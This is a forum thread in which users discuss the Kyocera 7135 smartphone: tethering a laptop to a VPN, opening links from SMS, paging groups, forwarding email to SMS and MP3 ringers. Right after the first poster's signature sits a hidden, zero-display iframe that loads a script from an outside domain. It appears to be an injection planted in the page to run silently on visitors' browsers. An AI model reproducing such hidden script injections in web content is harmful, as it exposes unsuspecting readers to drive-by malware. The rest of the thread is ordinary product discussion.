+ Reply to Thread

What DO I like about my 7135?

There are so many good things about this phone that it is hard to list them all, but I just had a great experience that I thought I would share.

I was supposed to have this afternoon off from work, and I had made an appointment to get my wife's car serviced. 2 minutes before I was supposed to head out the door, I got a call from one of the people I support BEGGING me to stay a bit late and look over an email about a customer issue. I said, no problem, I'll check it out in 15 minutes. Grabbed the laptop and USB data cable and threw them in the car. Get to the car dealer, gave them the keys, and sat down in the waiting room. 2 minutes later the laptop was booted, I was connected to the VPN at speeds as fast as my IDSL at home, and was able to respond to the message a few minutes later. Problem solved thanks to my 7135!

Now I am fighting off the bordem of waiting for the car by surfing the smartphone source board.

Alan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thanks a ton for this thread AND your thread about your dislikes. I'm on Sprint and still haven't touched or even seen a real live 7135 and I'm interested in hearing both positive and negative experiences from users.

Overall, it sounds like you're a happy customer, right?

Originally posted by pizzaface
    Thanks a ton for this thread AND your thread about your dislikes. I'm on Sprint and still haven't touched or even seen a real live 7135 and I'm interested in hearing both positive and negative experiences from users.

Overall, it sounds like you're a happy customer, right?
    I am delighted with the phone. I kept hoping someone at the car dealership would recognize it and want to talk about it

Like I said in the other thread, I only mentioned the little irritating quirks becuase people were asking, and I find problems in software for a living, so I am very good at finding even the most minor ones. There is not a single piece of commercial software that I have ever used where I haven't idendified at least one bug.

This phone has totally exceeded my expectations. It is nearly the perfect converged device.

Alan

@ Alan et al

Paging:

Do y'all do much of it? If so, would you comment on my situation? If not, skip to the next thing.

I plan to use my phone as my pager. To see how well it works, I've been having my skytel 2-way pages forwarded to my 2235 cell phone. So far it has worked quite well. I'd like to do more than what I can do now on my current phone. I tried out a t68i ATTWS phone and it does some other cool things.

Currently, I can send both text and SMS messages to email addresses and SMS capable phones. However, I can't build and use paging groups. The closest I've gotten to that is with my m505+cellphone and sending a text email message to a distribution list. This is not using SMS though.

URL & phone links in SMS or email messages:

When I get a message with url or a phone number, I'd like to select it and automatically launch a browser or call, respectively. I can do that with a t68i phone also.

(I think I saw a thread on the url issue but the search isn't picking it up.)

Originally posted by Beryl
    @ Alan et al

Paging:

Do y'all do much of it? If so, would you comment on my situation? If not, skip to the next thing.

I plan to use my phone as my pager. To see how well it works, I've been having my skytel 2-way pages forwarded to my 2235 cell phone. So far it has worked quite well. I'd like to do more than what I can do now on my current phone. I tried out a t68i ATTWS phone and it does some other cool things.

Currently, I can send both text and SMS messages to email addresses and SMS capable phones. However, I can't build and use paging groups. The closest I've gotten to that is with my m505+cellphone and sending a text email message to a distribution list. This is not using SMS though.

URL & phone links in SMS or email messages:

When I get a message with url or a phone number, I'd like to select it and automatically launch a browser or call, respectively. I can do that with a t68i phone also.

(I think I saw a thread on the url issue but the search isn't picking it up.)
    From an incoming SMS message (or SMS from email) you can link to embedded URL's by selecting LINK on the action menu. It opens the EIS browser and goes to the URL.

You can call back if the SMS orginated from another phone, or if the callback number is in the subject field of an email and there is nothing in the body of the message (you can have additional text in the subject, just nothing in the body).

Verizon appears to let you set up SMS group distribution lists on the vtext.com web site, but I have never tried this or looked at the instructions in enough detail to know whether it would meet your needs.

Alan

Thanks a bunch, Alan. I'm getting so excited about getting this phone -- look out FedEx guy!

Originally posted by alanb
    Verizon appears to let you set up SMS group distribution lists on the vtext.com web site, but I have never tried this or looked at the instructions in enough detail to know whether it would meet your needs.
    Alan
    Yeah, I knew about that but I think that only lets you page from the site. I guess I can use that from a browser. I'm not sure though since you KNOW how picky that site is. Netscape doesn't even work on many of the pages. sigh, I HATE Microsoft!

Sounds like a software development oppty.

Originally posted by Beryl
    Thanks a bunch, Alan. I'm getting so excited about getting this phone -- look out FedEx guy!

Yeah, I knew about that but I think that only lets you page from the site. I guess I can use that from a browser. I'm not sure though since you KNOW how picky that site is. Netscape doesn't even work on many of the pages. sigh, I HATE Microsoft!

Sounds like a software development oppty.
    I run my own email server, so as long as I can do email to SMS, I can pretty much do what I want as far as lists, autoforwarding, etc.... I suppose if the volume isn't too outragous (and how could it be for a single user), I could set up a few lists on my server for you. Probably set you up with access to manage your lists over the web.

This is how I do email push. I have an email address on the server, that I forward a copy of all messages to my mobile#@vtext.com. That way, I get the full email in my inbox that I can check with eudora mail (or maybe snapper, I am going to download the trial tonight), but I also get the 1st 180 charecters in SMS right away.

Alan

Alan

As a music lover, I can say that the MP3 player sounds very good through the headset. MP3's through the phone speaker are about AM radio quality. MP3 ringers are a lot of fun. I made a James Brown "Super Bad" ringer. A funky ring helps offset the nerd factor!

Originally posted by alanb
    I could set up a few lists on my server for you. Probably set you up with access to manage your lists over the web.
    Thanks for the ideas, Alan! I have access to an email server at work and think I can exploit that.